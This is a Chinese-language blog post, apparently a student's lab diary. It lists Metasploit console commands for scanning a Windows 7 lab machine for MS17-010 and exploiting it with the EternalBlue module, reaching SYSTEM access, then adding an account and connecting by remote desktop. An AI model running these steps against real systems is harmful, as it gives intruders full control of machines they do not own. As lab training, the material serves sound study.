使用kali中的Metasploit通过windows7的永恒之蓝漏洞攻击并控制win7系统（9.27 第十三天） | 攻击

攻击

关注(28)粉丝(399)

使用kali中的Metasploit通过windows7的永恒之蓝漏洞攻击并控制win7系统（9.27 第十三天）

1、开启postgresql数据库

使用kali中的Metasploit通过windows7的永恒之蓝漏洞攻击并控制win7系统（9.27 第十三天）-LMLPHP

2、msfconsole 进入MSF中

3、search 17-010 搜索cve17-010相关的exp

auxiliary/scanner/smb/smb_ms17_010 扫描漏洞是否存在

exploit/windows/smb/ms17_010_eternalblue 用来攻击的exp

使用kali中的Metasploit通过windows7的永恒之蓝漏洞攻击并控制win7系统（9.27 第十三天）-LMLPHP

4、探测漏洞是否存在

use auxiliary/scanner/smb/smb_ms17_010

使用kali中的Metasploit通过windows7的永恒之蓝漏洞攻击并控制win7系统（9.27 第十三天）-LMLPHP

5、set rhosts 192.168.121.146 指定需要设置的主机

exploit 设置完成之后运行

使用kali中的Metasploit通过windows7的永恒之蓝漏洞攻击并控制win7系统（9.27 第十三天）-LMLPHP

6、实施攻击

use exploit/windows/smb/ms17_010_eternalblue 进去攻击模块

set rhosts 192.168.121.146 指定攻击ip

exploit 运行

使用kali中的Metasploit通过windows7的永恒之蓝漏洞攻击并控制win7系统（9.27 第十三天）-LMLPHP

使用kali中的Metasploit通过windows7的永恒之蓝漏洞攻击并控制win7系统（9.27 第十三天）-LMLPHP

7、到这里我们就攻击成功了，直接得到目标的system权限

8、然后创建账户--打开3380端口--rdesktop 靶机的IP 使用远程桌面连接靶机--连接完成

05-26 13:30